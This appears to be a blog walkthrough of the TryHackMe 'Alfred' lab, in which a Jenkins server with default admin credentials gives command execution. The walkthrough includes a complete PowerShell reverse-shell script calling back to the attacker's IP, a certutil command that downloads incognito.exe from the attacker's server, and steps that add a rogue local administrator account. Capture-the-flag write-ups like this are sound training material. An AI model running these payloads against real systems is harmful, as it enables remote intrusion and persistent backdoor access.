You dont have javascript enabled! Please enable it!

Alfred – TryHackMe – Manual Writeup

Reading Time: ( Word Count: )

February 22, 2021

Intro

We’ll exploit a common misconfiguration on a widely used automation server (Jenkins) and gain access through windows tokens.

 

Enumeration

 

Nmap scan

  ┌──(kali㉿kali)-[~]      └─$ export IP=10.10.117.45   ┌──(kali㉿kali)-[~]      └─$ nmap -p- -A -Pn -v $IP
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Site doesn't have a title (text/html). 3389/tcp open tcpwrapped | ssl-cert: Subject: commonName=alfred | Issuer: commonName=alfred | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2020-10-02T14:42:05 | Not valid after: 2021-04-03T14:42:05 | MD5: fdb2 cd17 fad1 160d 06bc c1d8 31f3 7636 |_SHA-1: 6577 409f 2b1a 3e36 7ca7 4449 57f2 98c1 8750 3a3e |_ssl-date: 2021-02-06T18:18:26+00:00; -1s from scanner time. 8080/tcp open http Jetty 9.4.z-SNAPSHOT |_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1 | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Site doesn't have a title (text/html;charset=utf-8).

Nothing interesting on port 80, an open RDP port on 3389 and another http web server on port 8080 with a login form. Trying to login with admin:admin succeeds.

Exploitation

Remote Code Execution

After checking out the tool, I found a way to execute commands on the underlying system:

1. Click on “project” on the start page:

 

2. “Configure” on the left side:

 

2.1 Configure your reverse shell script, start a listener & http server:

  ┌──(kali㉿kali)-[~]      └─$ cat revsh.ps1 $client = New-Object System.Net.Sockets.TCPClient('10.8.152.223',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); } $client.Close();   ┌──(kali㉿kali)-[~]      └─$ sudo nc -nlvp 443   ┌──(kali㉿kali)-[~]      └─$ python3 -m http.server 5300

 

3. Scroll down and enter your command in the “Command” field & Save:

 

4. After clicking on “Build”, you should get a reverse shell:

listening on [any] 443 ... connect to [10.8.152.221] from (UNKNOWN) [10.10.117.45] 50077 PS C:\Program Files (x86)\Jenkins\workspace\project> whoami alfred\bruce PS C:\Program Files (x86)\Jenkins\workspace\project>

Privilege Escalation

PS > whoami /priv
PRIVILEGES INFORMATION ---------------------- Privilege Name Description State =============================== ========================================= ======== SeDebugPrivilege Debug programs Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled

SeDebugPrivilege & SeCreateGlobalPrivilege are enabled for bruce. These tokens will enable us to impersonate another user or even create one and assign it with administrative privileges.

 

We’ll need to download a binary called incognito.exe to get this to work. We can afterwards transfer it from a local http server.

  ┌──(kali㉿kali)-[~]      └─$ python3 -m http.server 5300
PS > certutil.exe -urlcache -split -f "http://10.8.152.221:5300/incognito.exe" incognito.exe

Now that we’ve downloaded the binary to the target machine, we can use it to add a user. 

PS > ./incognito.exe add_user nextdoorsec passwordd
PS > ./incognito.exe add_localgroup_user Administrators nextdoorsec   ┌──(kali㉿kali)-[~]      └─$ rdesktop -u nextdoorsec -p passwordd $IP

We’ve added a user named “nextdoorsec” with a password “passwordd” and afterwards assigned it to the “Administrators” group. To test it out, you can connect to the open RDP port.

Other interesting articles

Cybersecurity vs. Software Engineering: Everything You Need to Know

Cybersecurity vs. Software Engineering: Everything You Need to Know

With an education background in computer science and the continuing progression of the world toward technology, ...
Why do Cyber Attackers Commonly Use Social Engineering Attacks?

Why do Cyber Attackers Commonly Use Social Engineering Attacks?

Cybercrime is not new; everyone is well aware of such an offense. There are several ways through which the attack ...
CyberBullying and CyberStalking: What is the Difference?

CyberBullying and CyberStalking: What is the Difference?

The world is becoming digital, and so does our daily life, and with the advancement of technology day by day, ...
How to Start Learning Cyber Security from Scratch in 2022?

How to Start Learning Cyber Security from Scratch in 2022?

Due to the increasing frequency of cybercrimes, cybersecurity is a topic that is becoming more and more popular, ...
0 Comments

Submit a Comment

Your email address will not be published.

error: Alert: Content is protected !!